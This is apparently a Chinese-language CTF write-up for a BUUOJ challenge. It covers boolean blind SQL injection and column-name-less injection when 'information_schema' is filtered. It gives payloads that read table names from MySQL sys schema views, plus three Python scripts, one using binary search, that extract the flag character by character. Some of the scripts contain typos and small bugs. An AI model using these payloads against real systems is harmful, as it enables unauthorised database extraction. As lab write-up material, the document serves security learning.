盲注+无列名注入(过滤information)

    判断:
    id=2||1=2 返回V&N
    id=2||1=1 返回Nul
    当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键
    id=2||length(database())>1 可以判断数据库语句

    使用脚本跑数据库名

    1. import requests
    3. url = "http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php"
    4. payload = '2||ascii(substr((select group_concat(table_name)from sys.schema_table_sratistics_with_buffer where table_shcema=database()),{},1))={}'
    5. flag = ''
    7. for j in range(1,500):
    8.     for i in range(32, 127):
    9.         py = payload.format(j, i)
    10.         post_data = {'id':py}
    11.         re = requests.post(url, data=post_data)
    12.         if 'NU1L' in re.text:
    13.             flag += chr(i)
    14.             print(result)
    15.             break

    接下来就是无列名注入
    https://blog.csdn.net/weixin_43940853/article/details/106164162

    这里要用到 ascci偏移,既mysql 中字符比较只比较字符串首字符
    ![9I]0XCBYQGK7Q)D]D_E%_Y.png
    我们这里可以利用这个特性 构造一个ascii 从 32 -128 的循环,与flag对比,满足条件则返回 True

    这里要注意
    flag += char(char-1) 是因为
    }W(KLYCSV8}9324W4`E4W]F.png
    我们要匹配的是 f 因此要 chr(i)-1

    最终脚本

    import requests

url = "http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php"
def add(flag):
    res = ''
    res += flag
    return res
flag = ''

for i in range(1,100):
    for char in range(32,127):
        hexchar = add(flag + chr(char))
        payload = '2||((select 1,"{}") > (select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
        #f1ag_1s_h3r3_hhhhh中经过测试有2个字段,因此要 1,"{}"

        data = {'id':payload}
        r = requests.post(url=url, data=data)
        text = r.text
        if 'Nu1L' in r.text:
            flag += char(char-1)
            print(flag)
            break

    单线程跑太慢,后来找到个二分的

    # coding:utf-8 
import requests
import time
url = 'http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php'
def str_hex(s): #十六进制转换 fl ==> 0x666c
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x','')
    res = '0x' + res
    return res

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        #payload = '1^(ascii(substr(database(),{},1))>{})'.format(i,mid) #爆库
        #payload = '1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid) #爆表
        #payload = '1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})'.format(i,mid) #猜测f1ag_1s_h3r3_hhhhh中的列名为flag
        key = (str_hex(res+chr(mid)))
        payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
        data = {
            'id':payload 
            }
        r = requests.post(url = url,  data = data)
        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Nu1L'  in r.text:
            left = mid + 1
        elif 'Nu1L' not in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    #res += chr(mid) #爆表
    res += chr(mid-1) #爆flag
    print(str(mid),res)